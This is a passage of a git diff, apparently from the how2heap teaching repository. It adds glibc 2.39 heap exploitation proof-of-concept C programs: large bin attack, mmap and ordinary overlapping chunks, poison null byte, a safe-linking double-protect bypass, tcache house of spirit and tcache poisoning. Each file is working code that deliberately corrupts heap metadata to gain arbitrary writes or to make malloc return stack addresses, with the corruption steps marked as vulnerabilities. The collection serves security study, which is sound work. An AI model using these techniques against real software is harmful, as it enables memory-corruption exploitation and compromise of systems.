printf("\t- Unsorted bin:\n"); + puts("\t\tunsorted_start <--> unsorted_middle <--> unsorted_end"); + printf("\t\t%p <--> %p <--> %p\n", unsorted_start-0x10, unsorted_middle-0x10, unsorted_end-0x10); + + printf("\t- 0x20 t-cache:\n"); + printf("\t\t* 0x%lx\n", *(long*)(metadata+0x90)); + printf("\t- 0x30 t-cache\n"); + printf("\t\t* 0x%lx\n", *(long*)(metadata+0x98)); + puts(""); + + puts("The fake chunk in the t-cache will look like the following:"); + dump_memory(metadata+0x70, 4); + puts(""); + + puts("We can now observe that the 0x30 t-cache points to unsorted_start and 0x20 t-cache points to "); + puts("unsorted_end, which is what we need to fake an unsorted-bin entry and hijack unsorted_middle."); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 7 |"); + puts("\t=============================="); + puts("\n"); + + // Step 7: Overwrite LSB of unsorted_start and unsorted_end to point to the fake t-cache metadata chunk + puts("Finally, all there is left to do is simply overwrite the LSB of unsorted_start FWD-"); + puts("and BCK pointer for unsorted_end to point to the faked t-cache metadata chunk."); + puts(""); + + /* VULNERABILITY */ + printf("\t- unsorted_start:\n"); + printf("\t\t*%p = %p\n", unsorted_start, metadata+0x80); + *(unsigned long *)unsorted_start = (unsigned long)(metadata+0x80); + puts(""); + + printf("\t- unsorted_end:\n"); + printf("\t\t*%p = %p\n", unsorted_end, metadata+0x80); + *(unsigned long *)(unsorted_end+0x8) = (unsigned long)(metadata+0x80); + puts(""); + /* VULNERABILITY */ + + puts("At this point, the unsorted bin will look like the following:"); + puts(""); + + puts("\t- unsorted bin:"); + printf("\t\t unsorted_start <--> metadata chunk <--> unsorted_end\n"); + printf("\t\t %p\t %p %p\n", unsorted_start, metadata+0x80, unsorted_end); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 8 |"); + puts("\t=============================="); + puts("\n"); + + // Step 8: allocate to win + puts("Now, simply just allocate a chunk that's within the 0x10000 range"); + puts("to allocate from the faked chunk. As an example, we will allocate a 0x288:"); + + puts("\t- 0x288 chunk:"); + + // Next allocation *could* be our faked chunk! + void *meta_chunk = malloc(0x288); + + printf("\t\tNew chunk\t @ %p\n", meta_chunk); + printf("\t\tt-cache metadata @ %p\n", metadata); + assert(meta_chunk == (metadata+0x90)); + puts(""); + + + puts("\n"); + puts("\t=============================="); + puts("\t| BONUS! |"); + puts("\t=============================="); + puts("\n"); + + // BONUS! + puts("Whilst the primary goal of this house is to provide a leakless way"); + puts("to gain t-cache control by overwriting LSB, a nice bonus is the free LIBC"); + puts("pointer we get as an added bonus to the method!"); + puts(""); + + puts("This is what the t-cache metadata will look like after we allocated the"); + puts("t-cache metadata chunk:"); + dump_memory(metadata+0x70, 4); + puts(""); + + + puts("Notice how the 0x20 and 0x30 t-cache now contains a libc pointer to the main_arena."); +} diff --git a/glibc_2.39/large_bin_attack.c b/glibc_2.39/large_bin_attack.c new file mode 100644 index 0000000..0a1d8c9 --- /dev/null +++ b/glibc_2.39/large_bin_attack.c @@ -0,0 +1,94 @@ +#include +#include +#include + +/* + +A revisit to large bin attack for after glibc2.30 + +Relevant code snippet : + + if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)){ + fwd = bck; + bck = bck->bk; + victim->fd_nextsize = fwd->fd; + victim->bk_nextsize = fwd->fd->bk_nextsize; + fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; + } + + +*/ + +int main(){ + /*Disable IO buffering to prevent stream from interfering with heap*/ + setvbuf(stdin,NULL,_IONBF,0); + setvbuf(stdout,NULL,_IONBF,0); + setvbuf(stderr,NULL,_IONBF,0); + + printf("\n\n"); + printf("Since glibc2.30, two new checks have been enforced on large bin chunk insertion\n\n"); + printf("Check 1 : \n"); + printf("> if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))\n"); + printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (nextsize)\");\n"); + printf("Check 2 : \n"); + printf("> if (bck->fd != fwd)\n"); + printf("> malloc_printerr (\"malloc(): largebin double linked list corrupted (bk)\");\n\n"); + printf("This prevents the traditional large bin attack\n"); + printf("However, there is still one possible path to trigger large bin attack. The PoC is shown below : \n\n"); + + printf("====================================================================\n\n"); + + size_t target = 0; + printf("Here is the target we want to overwrite (%p) : %lu\n\n",&target,target); + size_t *p1 = malloc(0x428); + printf("First, we allocate a large chunk [p1] (%p)\n",p1-2); + size_t *g1 = malloc(0x18); + printf("And another chunk to prevent consolidate\n"); + + printf("\n"); + + size_t *p2 = malloc(0x418); + printf("We also allocate a second large chunk [p2] (%p).\n",p2-2); + printf("This chunk should be smaller than [p1] and belong to the same large bin.\n"); + size_t *g2 = malloc(0x18); + printf("Once again, allocate a guard chunk to prevent consolidate\n"); + + printf("\n"); + + free(p1); + printf("Free the larger of the two --> [p1] (%p)\n",p1-2); + size_t *g3 = malloc(0x438); + printf("Allocate a chunk larger than [p1] to insert [p1] into large bin\n"); + + printf("\n"); + + free(p2); + printf("Free the smaller of the two --> [p2] (%p)\n",p2-2); + printf("At this point, we have one chunk in large bin [p1] (%p),\n",p1-2); + printf(" and one chunk in unsorted bin [p2] (%p)\n",p2-2); + + printf("\n"); + + p1[3] = (size_t)((&target)-4); + printf("Now modify the p1->bk_nextsize to [target-0x20] (%p)\n",(&target)-4); + + printf("\n"); + + size_t *g4 = malloc(0x438); + printf("Finally, allocate another chunk larger than [p2] (%p) to place [p2] (%p) into large bin\n", p2-2, p2-2); + printf("Since glibc does not check chunk->bk_nextsize if the new inserted chunk is smaller than smallest,\n"); + printf(" the modified p1->bk_nextsize does not trigger any error\n"); + printf("Upon inserting [p2] (%p) into largebin, [p1](%p)->bk_nextsize->fd_nextsize is overwritten to address of [p2] (%p)\n", p2-2, p1-2, p2-2); + + printf("\n"); + + printf("In our case here, target is now overwritten to address of [p2] (%p), [target] (%p)\n", p2-2, (void *)target); + printf("Target (%p) : %p\n",&target,(size_t*)target); + + printf("\n"); + printf("====================================================================\n\n"); + + assert((size_t)(p2-2) == target); + + return 0; +} diff --git a/glibc_2.39/mmap_overlapping_chunks.c b/glibc_2.39/mmap_overlapping_chunks.c new file mode 100644 index 0000000..052392b --- /dev/null +++ b/glibc_2.39/mmap_overlapping_chunks.c @@ -0,0 +1,140 @@ +#include +#include +#include + +/* +Technique should work on all versions of GLibC +Compile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g` + +POC written by POC written by Maxwell Dulin (Strikeout) +*/ +int main(){ + /* + A primer on Mmap chunks in GLibC + ================================== + In GLibC, there is a point where an allocation is so large that malloc + decides that we need a seperate section of memory for it, instead + of allocating it on the normal heap. This is determined by the mmap_threshold var. + Instead of the normal logic for getting a chunk, the system call *Mmap* is + used. This allocates a section of virtual memory and gives it back to the user. + + Similarly, the freeing process is going to be different. Instead + of a free chunk being given back to a bin or to the rest of the heap, + another syscall is used: *Munmap*. This takes in a pointer of a previously + allocated Mmap chunk and releases it back to the kernel. + + Mmap chunks have special bit set on the size metadata: the second bit. If this + bit is set, then the chunk was allocated as an Mmap chunk. + + Mmap chunks have a prev_size and a size. The *size* represents the current + size of the chunk. The *prev_size* of a chunk represents the left over space + from the size of the Mmap chunk (not the chunks directly belows size). + However, the fd and bk pointers are not used, as Mmap chunks do not go back + into bins, as most heap chunks in GLibC Malloc do. Upon freeing, the size of + the chunk must be page-aligned. + + The POC below is essentially an overlapping chunk attack but on mmap chunks. + This is very similar to https://github.com/shellphish/how2heap/blob/master/glibc_2.26/overlapping_chunks.c. + The main difference is that mmapped chunks have special properties and are + handled in different ways, creating different attack scenarios than normal + overlapping chunk attacks. There are other things that can be done, + such as munmapping system libraries, the heap itself and other things. + This is meant to be a simple proof of concept to demonstrate the general + way to perform an attack on an mmap chunk. + + For more information on mmap chunks in GLibC, read this post: + http://tukan.farm/2016/07/27/munmap-madness/ + */ + + int* ptr1 = malloc(0x10); + + printf("This is performing an overlapping chunk attack but on extremely large chunks (mmap chunks).\n"); + printf("Extremely large chunks are special because they are allocated in their own mmaped section\n"); + printf("of memory, instead of being put onto the normal heap.\n"); + puts("=======================================================\n"); + printf("Allocating three extremely large heap chunks of size 0x100000 \n\n"); + + long long* top_ptr = malloc(0x100000); + printf("The first mmap chunk goes directly above LibC: %p\n",top_ptr); + + // After this, all chunks are allocated downwards in memory towards the heap. + long long* mmap_chunk_2 = malloc(0x100000); + printf("The second mmap chunk goes below LibC: %p\n", mmap_chunk_2); + + long long* mmap_chunk_3 = malloc(0x100000); + printf("The third mmap chunk goes below the second mmap chunk: %p\n", mmap_chunk_3); + + printf("\nCurrent System Memory Layout \n" \ +"================================================\n" \ +"running program\n" \ +"heap\n" \ +"....\n" \ +"third mmap chunk\n" \ +"second mmap chunk\n" \ +"LibC\n" \ +"....\n" \ +"ld\n" \ +"first mmap chunk\n" +"===============================================\n\n" \ +); + + printf("Prev Size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-2]); + printf("Size of third mmap chunk: 0x%llx\n\n", mmap_chunk_3[-1]); + + printf("Change the size of the third mmap chunk to overlap with the second mmap chunk\n"); + printf("This will cause both chunks to be Munmapped and given back to the system\n"); + printf("This is where the vulnerability occurs; corrupting the size or prev_size of a chunk\n"); + + // Vulnerability!!! This could be triggered by an improper index or a buffer overflow from a chunk further below. + // Additionally, this same attack can be used with the prev_size instead of the size. + mmap_chunk_3[-1] = (0xFFFFFFFFFD & mmap_chunk_3[-1]) + (0xFFFFFFFFFD & mmap_chunk_2[-1]) | 2; + printf("New size of third mmap chunk: 0x%llx\n", mmap_chunk_3[-1]); + printf("Free the third mmap chunk, which munmaps the second and third chunks\n\n"); + + /* + This next call to free is actually just going to call munmap on the pointer we are passing it. + The source code for this can be found at https://elixir.bootlin.com/glibc/glibc-2.26/source/malloc/malloc.c#L2845 + + With normal frees the data is still writable and readable (which creates a use after free on + the chunk). However, when a chunk is munmapped, the memory is given back to the kernel. If this + data is read or written to, the program crashes. + + Because of this added restriction, the main goal is to get the memory back from the system + to have two pointers assigned to the same location. + */ + // Munmaps both the second and third pointers + free(mmap_chunk_3); + + /* + Would crash, if on the following: + mmap_chunk_2[0] = 0xdeadbeef; + This is because the memory would not be allocated to the current program. + */ + + /* + Allocate a very large chunk with malloc. This needs to be larger than + the previously freed chunk because the mmapthreshold has increased to 0x202000. + If the allocation is not larger than the size of the largest freed mmap + chunk then the allocation will happen in the normal section of heap memory. + */ + printf("Get a very large chunk from malloc to get mmapped chunk\n"); + printf("This should overlap over the previously munmapped/freed chunks\n"); + long long* overlapping_chunk = malloc(0x300000); + printf("Overlapped chunk Ptr: %p\n", overlapping_chunk); + printf("Overlapped chunk Ptr Size: 0x%llx\n", overlapping_chunk[-1]); + + // Gets the distance between the two pointers. + int distance = mmap_chunk_2 - overlapping_chunk; + printf("Distance between new chunk and the second mmap chunk (which was munmapped): 0x%x\n", distance); + printf("Value of index 0 of mmap chunk 2 prior to write: %llx\n", mmap_chunk_2[0]); + + // Set the value of the overlapped chunk. + printf("Setting the value of the overlapped chunk\n"); + overlapping_chunk[distance] = 0x1122334455667788; + + // Show that the pointer has been written to. + printf("Second chunk value (after write): 0x%llx\n", mmap_chunk_2[0]); + printf("Overlapped chunk value: 0x%llx\n\n", overlapping_chunk[distance]); + printf("Boom! The new chunk has been overlapped with a previous mmaped chunk\n"); + assert(mmap_chunk_2[0] == overlapping_chunk[distance]); +} diff --git a/glibc_2.39/overlapping_chunks.c b/glibc_2.39/overlapping_chunks.c new file mode 100644 index 0000000..5c12f7f --- /dev/null +++ b/glibc_2.39/overlapping_chunks.c @@ -0,0 +1,82 @@ +/* + + A simple tale of overlapping chunk. + This technique is taken from + http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf + +*/ + +#include +#include +#include +#include +#include + +int main(int argc , char* argv[]) +{ + setbuf(stdout, NULL); + + long *p1,*p2,*p3,*p4; + printf("\nThis is another simple chunks overlapping problem\n"); + printf("The previous technique is killed by patch: https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c\n" + "which ensures the next chunk of an unsortedbin must have prev_inuse bit unset\n" + "and the prev_size of it must match the unsortedbin's size\n" + "This new poc uses the same primitive as the previous one. Theoretically speaking, they are the same powerful.\n\n"); + + printf("Let's start to allocate 4 chunks on the heap\n"); + + p1 = malloc(0x80 - 8); + p2 = malloc(0x500 - 8); + p3 = malloc(0x80 - 8); + + printf("The 3 chunks have been allocated here:\np1=%p\np2=%p\np3=%p\n", p1, p2, p3); + + memset(p1, '1', 0x80 - 8); + memset(p2, '2', 0x500 - 8); + memset(p3, '3', 0x80 - 8); + + printf("Now let's simulate an overflow that can overwrite the size of the\nchunk freed p2.\n"); + int evil_chunk_size = 0x581; + int evil_region_size = 0x580 - 8; + printf("We are going to set the size of chunk p2 to to %d, which gives us\na region size of %d\n", + evil_chunk_size, evil_region_size); + + /* VULNERABILITY */ + *(p2-1) = evil_chunk_size; // we are overwriting the "size" field of chunk p2 + /* VULNERABILITY */ + + printf("\nNow let's free the chunk p2\n"); + free(p2); + printf("The chunk p2 is now in the unsorted bin ready to serve possible\nnew malloc() of its size\n"); + + printf("\nNow let's allocate another chunk with a size equal to the data\n" + "size of the chunk p2 injected size\n"); + printf("This malloc will be served from the previously freed chunk that\n" + "is parked in the unsorted bin which size has been modified by us\n"); + p4 = malloc(evil_region_size); + + printf("\np4 has been allocated at %p and ends at %p\n", (char *)p4, (char *)p4+evil_region_size); + printf("p3 starts at %p and ends at %p\n", (char *)p3, (char *)p3+0x580-8); + printf("p4 should overlap with p3, in this case p4 includes all p3.\n"); + + printf("\nNow everything copied inside chunk p4 can overwrites data on\nchunk p3," + " and data written to chunk p3 can overwrite data\nstored in the p4 chunk.\n\n"); + + printf("Let's run through an example. Right now, we have:\n"); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + printf("\nIf we memset(p4, '4', %d), we have:\n", evil_region_size); + memset(p4, '4', evil_region_size); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + printf("\nAnd if we then memset(p3, '3', 80), we have:\n"); + memset(p3, '3', 80); + printf("p4 = %s\n", (char *)p4); + printf("p3 = %s\n", (char *)p3); + + assert(strstr((char *)p4, (char *)p3)); +} + + diff --git a/glibc_2.39/poison_null_byte.c b/glibc_2.39/poison_null_byte.c new file mode 100644 index 0000000..5a34837 --- /dev/null +++ b/glibc_2.39/poison_null_byte.c @@ -0,0 +1,161 @@ +#include +#include +#include +#include + +int main() +{ + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + puts("Welcome to poison null byte!"); + puts("Tested in Ubuntu 20.04 64bit."); + puts("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte."); + + puts("Some of the implementation details are borrowed from https://github.com/StarCross-Tech/heap_exploit_2.31/blob/master/off_by_null.c\n"); + + // step1: allocate padding + puts("Step1: allocate a large padding so that the fake chunk's addresses's lowest 2nd byte is \\x00"); + void *tmp = malloc(0x1); + void *heap_base = (void *)((long)tmp & (~0xfff)); + printf("heap address: %p\n", heap_base); + size_t size = 0x10000 - ((long)tmp&0xffff) - 0x20; + printf("Calculate padding chunk size: 0x%lx\n", size); + puts("Allocate the padding. This is required to avoid a 4-bit bruteforce because we are going to overwrite least significant two bytes."); + void *padding= malloc(size); + + // step2: allocate prev chunk and victim chunk + puts("\nStep2: allocate two chunks adjacent to each other."); + puts("Let's call the first one 'prev' and the second one 'victim'."); + void *prev = malloc(0x500); + void *victim = malloc(0x4f0); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + printf("prev chunk: malloc(0x500) = %p\n", prev); + printf("victim chunk: malloc(0x4f0) = %p\n", victim); + + // step3: link prev into largebin + puts("\nStep3: Link prev into largebin"); + puts("This step is necessary for us to forge a fake chunk later"); + puts("The fd_nextsize of prev and bk_nextsize of prev will be the fd and bck pointers of the fake chunk"); + puts("allocate a chunk 'a' with size a little bit smaller than prev's"); + void *a = malloc(0x4f0); + printf("a: malloc(0x4f0) = %p\n", a); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + puts("allocate a chunk 'b' with size a little bit larger than prev's"); + void *b = malloc(0x510); + printf("b: malloc(0x510) = %p\n", b); + puts("malloc(0x10) to avoid consolidation"); + malloc(0x10); + + puts("\nCurrent Heap Layout\n" + " ... ...\n" + "padding\n" + " prev Chunk(addr=0x??0010, size=0x510)\n" + " victim Chunk(addr=0x??0520, size=0x500)\n" + " barrier Chunk(addr=0x??0a20, size=0x20)\n" + " a Chunk(addr=0x??0a40, size=0x500)\n" + " barrier Chunk(addr=0x??0f40, size=0x20)\n" + " b Chunk(addr=0x??0f60, size=0x520)\n" + " barrier Chunk(addr=0x??1480, size=0x20)\n"); + + puts("Now free a, b, prev"); + free(a); + free(b); + free(prev); + puts("current unsorted_bin: header <-> [prev, size=0x510] <-> [b, size=0x520] <-> [a, size=0x500]\n"); + + puts("Allocate a huge chunk to enable sorting"); + malloc(0x1000); + puts("current large_bin: header <-> [b, size=0x520] <-> [prev, size=0x510] <-> [a, size=0x500]\n"); + + puts("This will add a, b and prev to largebin\nNow prev is in largebin"); + printf("The fd_nextsize of prev points to a: %p\n", ((void **)prev)[2]+0x10); + printf("The bk_nextsize of prev points to b: %p\n", ((void **)prev)[3]+0x10); + + // step4: allocate prev again to construct fake chunk + puts("\nStep4: Allocate prev again to construct the fake chunk"); + puts("Since large chunk is sorted by size and a's size is smaller than prev's,"); + puts("we can allocate 0x500 as before to take prev out"); + void *prev2 = malloc(0x500); + printf("prev2: malloc(0x500) = %p\n", prev2); + puts("Now prev2 == prev, prev2->fd == prev2->fd_nextsize == a, and prev2->bk == prev2->bk_nextsize == b"); + assert(prev == prev2); + + puts("The fake chunk is contained in prev and the size is smaller than prev's size by 0x10"); + puts("So set its size to 0x501 (0x510-0x10 | flag)"); + ((long *)prev)[1] = 0x501; + puts("And set its prev_size(next_chunk) to 0x500 to bypass the size==prev_size(next_chunk) check"); + *(long *)(prev + 0x500) = 0x500; + printf("The fake chunk should be at: %p\n", prev + 0x10); + puts("use prev's fd_nextsize & bk_nextsize as fake_chunk's fd & bk"); + puts("Now we have fake_chunk->fd == a and fake_chunk->bk == b"); + + // step5: bypass unlinking + puts("\nStep5: Manipulate residual pointers to bypass unlinking later."); + puts("Take b out first by allocating 0x510"); + void *b2 = malloc(0x510); + printf("Because of the residual pointers in b, b->fd points to a right now: %p\n", ((void **)b2)[0]+0x10); + printf("We can overwrite the least significant two bytes to make it our fake chunk.\n" + "If the lowest 2nd byte is not \\x00, we need to guess what to write now\n"); + ((char*)b2)[0] = '\x10'; + ((char*)b2)[1] = '\x00'; // b->fd <- fake_chunk + printf("After the overwrite, b->fd is: %p, which is the chunk pointer to our fake chunk\n", ((void **)b2)[0]); + + puts("To do the same to a, we can move it to unsorted bin first" + "by taking it out from largebin and free it into unsortedbin"); + void *a2 = malloc(0x4f0); + free(a2); + puts("Now free victim into unsortedbin so that a->bck points to victim"); + free(victim); + printf("a->bck: %p, victim: %p\n", ((void **)a)[1], victim); + puts("Again, we take a out and overwrite a->bck to fake chunk"); + void *a3 = malloc(0x4f0); + ((char*)a3)[8] = '\x10'; + ((char*)a3)[9] = '\x00'; + printf("After the overwrite, a->bck is: %p, which is the chunk pointer to our fake chunk\n", ((void **)a3)[1]); + // pass unlink_chunk in malloc.c: + // mchunkptr fd = p->fd; + // mchunkptr bk = p->bk; + // if (__builtin_expect (fd->bk != p || bk->fd != p, 0)) + // malloc_printerr ("corrupted double-linked list"); + puts("And we have:\n" + "fake_chunk->fd->bk == a->bk == fake_chunk\n" + "fake_chunk->bk->fd == b->fd == fake_chunk\n" + ); + + // step6: add fake chunk into unsorted bin by off-by-null + puts("\nStep6: Use backward consolidation to add fake chunk into unsortedbin"); + puts("Take victim out from unsortedbin"); + void *victim2 = malloc(0x4f0); + printf("%p\n", victim2); + puts("off-by-null into the size of vicim"); + /* VULNERABILITY */ + ((char *)victim2)[-8] = '\x00'; + /* VULNERABILITY */ + + puts("Now if we free victim, libc will think the fake chunk is a free chunk above victim\n" + "It will try to backward consolidate victim with our fake chunk by unlinking the fake chunk then\n" + "add the merged chunk into unsortedbin." + ); + printf("For our fake chunk, because of what we did in step4,\n" + "now P->fd->bk(%p) == P(%p), P->bk->fd(%p) == P(%p)\n" + "so the unlink will succeed\n", ((void **)a3)[1], prev, ((void **)b2)[0], prev); + free(victim); + puts("After freeing the victim, the new merged chunk is added to unsorted bin" + "And it is overlapped with the prev chunk"); + + // step7: validate the chunk overlapping + puts("Now let's validate the chunk overlapping"); + void *merged = malloc(0x100); + printf("merged: malloc(0x100) = %p\n", merged); + memset(merged, 'A', 0x80); + printf("Now merged's content: %s\n", (char *)merged); + + puts("Overwrite prev's content"); + memset(prev2, 'C', 0x80); + printf("merged's content has changed to: %s\n", (char *)merged); + + assert(strstr(merged, "CCCCCCCCC")); +} diff --git a/glibc_2.39/safe_link_double_protect.c b/glibc_2.39/safe_link_double_protect.c new file mode 100644 index 0000000..3c11f1b --- /dev/null +++ b/glibc_2.39/safe_link_double_protect.c @@ -0,0 +1,128 @@ +#include +#include +#include +#include + +/* + * This method showcases a blind bypass for the safe-linking mitigation introduced in glibc 2.32. + * https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41 + * + * NOTE: This requires 4 bits of bruteforce if the primitive is a write primitive, as the LSB will + * contain 4 bits of randomness. If you can increment integers, no brutefore is required. + * + * Safe-Linking is a memory protection measure using ASLR randomness to fortify single-linked lists. + * It obfuscates pointers and enforces alignment checks, to prevent pointer hijacking in t-cache. + * + * When an entry is linked in to the t-cache, the address is XOR'd with the address that free is + * called on, shifted by 12 bits. However if you were to link this newly protected pointer, it + * would be XOR'd again with the same key, effectively reverting the protection. + * Thus, by simply protecting a pointer twice we effectively achieve the following: + * + * (ptr^key)^key = ptr + * + * The technique requires control over the t-cache metadata, so pairing it with a technique such as + * house of water might be favourable. + * + * Technique by @udp_ctf - Water Paddler / Blue Water + */ + +int main(void) { + // Prevent _IO_FILE from buffering in the heap + setbuf(stdin, NULL); + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + // Create the goal stack buffer + char goal[] = "Replace me!"; + puts("============================================================"); + printf("Our goal is to write to the stack variable @ %p\n", goal); + printf("String contains: %s\n", goal); + puts("============================================================"); + puts("\n"); + + // Step 1: Allocate + puts("Allocate two chunks in two different t-caches:"); + + // Allocate two chunks of size 0x38 for 0x40 t-cache + puts("\t- 0x40 chunks:"); + void *a = malloc(0x38); + void *b = malloc(0x38); + printf("\t\t* Entry a @ %p\n", a); + printf("\t\t* Entry b @ %p\n", b); + + // Allocate two chunks of size 0x18 for 0x20 t-cache + void *c = malloc(0x18); + void *d = malloc(0x18); + puts("\t- 0x20 chunks:"); + printf("\t\t* Entry c @ %p\n", c); + printf("\t\t* Entry d @ %p\n", d); + puts(""); + + // Step 2: Write an arbitrary value (or note the offset to an exsisting value) + puts("Allocate a pointer which will contain a pointer to the stack variable:"); + + // Allocate a chunk and store a modified pointer to the 'goal' array. + void *value = malloc(0x28); + // make sure that the pointer ends on 0 for proper heap alignemnt or a fault will occur + *(long *)value = ((long)(goal) & ~(0xf)); + + printf("\t* Arbitrary value (0x%lx) written to %p\n", *(long*)value, value); + puts(""); + + // Step 3: Free the two chunks in the two t-caches to make two t-cache entries in two different caches + puts("Free the 0x40 and 0x20 chunks to populate the t-caches"); + + puts("\t- Free 0x40 chunks:"); + // Free the allocated 0x38 chunks to populate the 0x40 t-cache + free(a); + free(b); + printf("\t\t> 0x40 t-cache: [%p -> %p]\n", b, a); + + puts("\t- Free the 0x20 chunks"); + // Free the allocated 0x18 chunks to populate the 0x20 t-cache + free(c); + free(d); + printf("\t\t> 0x20 t-cache: [%p -> %p]\n", d, c); + puts(""); + + // Step 4: Using our t-cache metadata control primitive, we will now execute the vulnerability + puts("Modify the 0x40 t-cache pointer to point to the heap value that holds our arbitrary value, "); + puts("by overwriting the LSB of the pointer for 0x40 in the t-cache metadata:"); + + // Calculate the address of the t-cache metadata + void *metadata = (void *)((long)(value) & ~(0xfff)); + + // Overwrite the LSB of the 0x40 t-cache chunk to point to the heap chunk containing the arbitrary value + *(unsigned int*)(metadata+0xa0) = (long)(metadata)+((long)(value) & (0xfff)); + + printf("\t\t> 0x40 t-cache: [%p -> 0x%lx]\n", value, (*(long*)value)^((long)metadata>>12)); + puts(""); + + puts("Allocate once to make the protected pointer the current entry in the 0x40 bin:"); + void *_ = malloc(0x38); + printf("\t\t> 0x40 t-cache: [0x%lx]\n", *(unsigned long*)(metadata+0xa0)); + puts(""); + + /* VULNERABILITY */ + puts("Point the 0x20 bin to the 0x40 bin in the t-cache metadata, containing the newly safe-linked value:"); + *(unsigned int*)(metadata+0x90) = (long)(metadata)+0xa0; + printf("\t\t> 0x20 t-cache: [0x%lx -> 0x%lx]\n", (long)(metadata)+0xa0, *(long*)value); + puts(""); + /* VULNERABILITY */ + + // Step 5: Allocate twice to allocate the arbitrary value + puts("Allocate twice to gain a pointer to our arbitrary value"); + + _ = malloc(0x18); + printf("\t\t> First 0x20 allocation: %p\n", _); + + char *vuln = malloc(0x18); + printf("\t\t> Second 0x20 allocation: %p\n", vuln); + puts(""); + + // Step 6: Overwrite the goal string pointer and verify it has been changed + strcpy(vuln, "XXXXXXXXXXX HIJACKED!"); + + printf("String now contains: %s\n", goal); + assert(strcmp(goal, "Replace me!") != 0); +} diff --git a/glibc_2.39/sysmalloc_int_free.c b/glibc_2.39/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.39/sysmalloc_int_free.c +++ b/glibc_2.39/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.39/tcache_house_of_spirit.c b/glibc_2.39/tcache_house_of_spirit.c new file mode 100644 index 0000000..3765af3 --- /dev/null +++ b/glibc_2.39/tcache_house_of_spirit.c @@ -0,0 +1,44 @@ +#include +#include +#include + +int main() +{ + setbuf(stdout, NULL); + + printf("This file demonstrates the house of spirit attack on tcache.\n"); + printf("It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n"); + printf("You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n"); + printf("(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n"); + + printf("Ok. Let's start with the example!.\n\n"); + + + printf("Calling malloc() once so that it sets up its memory.\n"); + malloc(1); + + printf("Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n"); + unsigned long long *a; //pointer that will be overwritten + unsigned long long fake_chunks[10]; //fake chunk region + + printf("This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]); + + printf("This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); + printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); + fake_chunks[1] = 0x40; // this is the size + + + printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]); + printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n"); + + a = &fake_chunks[2]; + + printf("Freeing the overwritten pointer.\n"); + free(a); + + printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]); + void *b = malloc(0x30); + printf("malloc(0x30): %p\n", b); + + assert((long)b == (long)&fake_chunks[2]); +} diff --git a/glibc_2.39/tcache_poisoning.c b/glibc_2.39/tcache_poisoning.c new file mode 100644 index 0000000..d3f6bb9 --- /dev/null +++ b/glibc_2.39/tcache_poisoning.c @@ -0,0 +1,63 @@ +#include +#include +#include +#include + +int main() +{ + // disable buffering + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n" + "returning a pointer to an arbitrary location (in this case, the stack).\n" + "The attack is very similar to fastbin corruption attack.\n"); + printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n" + "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n"); + printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n" + "An heap address leak is needed to perform tcache poisoning.\n" + "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n"); + + size_t stack_var[0x10]; + size_t *target = NULL; + + // choose a properly aligned target address + for(int i=0; i<0x10; i++) { + if(((long)&stack_var[i] & 0xf) == 0) { + target = &stack_var[i]; + break; + } + } + assert(target != NULL); + + printf("The address we want malloc() to return is %p.\n", target); + + printf("Allocating 2 buffers.\n"); + intptr_t *a = malloc(128); + printf("malloc(128): %p\n", a); + intptr_t *b = malloc(128); + printf("malloc(128): %p\n", b); + + printf("Freeing the buffers...\n"); + free(a); + free(b); + + printf("Now the tcache list has [ %p -> %p ].\n", b, a); + printf("We 